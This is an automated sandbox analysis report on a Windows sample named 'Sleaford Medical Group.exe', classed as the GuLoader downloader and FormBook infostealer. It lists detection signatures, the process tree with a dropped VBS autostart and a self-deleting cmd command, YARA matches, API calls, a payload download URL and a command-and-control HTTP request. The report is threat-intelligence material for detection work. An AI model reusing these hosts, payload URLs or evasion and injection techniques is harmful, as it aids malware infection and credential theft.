
Analysis Report Sleaford Medical Group.exe

Overview

General Information

Sample Name: Sleaford Medical Group.exe
Analysis ID: 358420
MD5: dde7e39d025b75849184c077517030ae
SHA1: 6350e468239b6099421676fb6ff289a27f8cda5a
SHA256: ba1ae604539b6cde921342baaceb3eb82149b0f15c369b77020b38254a586629
Tags: GuLoader

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Sleaford Medical Group.exe (PID: 2412 cmdline: 'C:\Users\user\Desktop\Sleaford Medical Group.exe' MD5: DDE7E39D025B75849184C077517030AE)
    • Sleaford Medical Group.exe (PID: 5356 cmdline: 'C:\Users\user\Desktop\Sleaford Medical Group.exe' MD5: DDE7E39D025B75849184C077517030AE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 5616 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
          • oversad.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe MD5: DDE7E39D025B75849184C077517030AE)
        • help.exe (PID: 6328 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6472 cmdline: /c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
(18 memory dump entries in total; the remaining entries are not shown here)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe; ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Sleaford Medical Group.exe; Virustotal: Detection: 47%
Source: Sleaford Medical Group.exe; ReversingLabs: Detection: 10%
Yara detected FormBook
Source: Yara match; File source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Sleaford Medical Group.exe; Joe Sandbox ML: detected
Source: 22.3.Sleaford Medical Group.exe.8cfbb0.0.unpack; Avira: Label: TR/Patched.Gen

Compliance:

Uses 32bit PE files
Source: Sleaford Medical Group.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 159.203.144.58:443 -> 192.168.2.3:49734 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Sleaford Medical Group.exe, 00000016.00000003.497880207.000000001E1D0000.00000004.00000001.sdmp, help.exe, 0000001C.00000002.734476074.00000000038BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Sleaford Medical Group.exe, help.exe
Source: Binary string: help.pdbGCTL source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: help.pdb source: Sleaford Medical Group.exe, 00000016.00000002.558311091.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000018.00000000.528248843.000000000E1C0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\help.exe; Code function: 4x nop then pop esi
Source: global traffic; HTTP traffic detected: GET /twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h HTTP/1.1 Host: www.landingberg.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; DNS traffic detected: queries for: 01677937777.burrow.io
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://cps.letsencrypt.org0
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: explorer.exe, 00000018.00000003.559663205.000000000F57C000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://crl.identrust.com/DSTROOTCAX
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://r3.i.lencr.org/0
Source: Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmp; String found in binary or memory: http://r3.o.lencr.org0
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmp; String found in binary or memory: https://01677937777.burrow.io/XzsF
Source: Sleaford Medical Group.exe; String found in binary or memory: https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin
Source: Sleaford Medical Group.exe, 00000016.00000002.565857663.0000000000858000.00000004.00000020.sdmp; String found in binary or memory: https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin38
Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmp; String found in binary or memory: https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binT
Source: Sleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmp; String found in binary or memory: https://01677937777.burrow.io/uzTF
Source: help.exe, 0000001C.00000002.736924910.00000000041BF000.00000004.00000001.sdmp; String found in binary or memory: https://www.landingberg.com/twy/?pPX=elx0UibK
Source: unknown; Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49734
Source: Sleaford Medical Group.exe, 00000000.00000002.459341616.000000000067A000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.731169512.000000000333D000.00000004.00000020.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11; Author: Florian Roth
Source: 0000001C.00000002.736741312.0000000003CCF000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11; Author: Florian Roth
Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe; Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D96D0 NtCreateKey,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3DA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3DA770 NtOpenThread,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9760 NtOpenProcess,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3DAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9560 NtWriteFile,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9A10 NtQuerySection,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3DA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3DB040 NtSuspendThread,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_1E3D99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Sleaford Medical Group.exe; Code function: 22_2_00566BBD NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038096D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038095D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_0380A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809A10 NtQuerySection,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809A20 NtResumeThread,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038099D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038098A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038098F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_0380B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038097A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_0380A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809760 NtOpenProcess,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_0380A770 NtOpenThread,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_038095F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_0380AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_03809560 NtWriteFile,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_02ED9EA0 NtClose,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_02ED9E20 NtReadFile,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_02ED9F50 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_02ED9D70 NtCreateFile,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_02ED9E9C NtClose,
Source: C:\Windows\SysWOW64\help.exe; Code function: 28_2_02ED9F4A NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDE23F
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDD1F5
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC9E40
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDE61C
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDCFB6
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC2FB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EDD5F1
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_02EC2D90
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 037CB150 appears 54 times
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: String function: 1E39B150 appears 45 times
      Source: Sleaford Medical Group.exe, 00000000.00000002.458812048.0000000000419000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSEMICALCINED.exe vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.584862109.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000000.457893775.0000000000419000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSEMICALCINED.exe vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.587041727.000000001E61F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000003.549281302.00000000008CD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exe, 00000016.00000002.584793888.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exeBinary or memory string: OriginalFilenameSEMICALCINED.exe vs Sleaford Medical Group.exe
      Source: Sleaford Medical Group.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
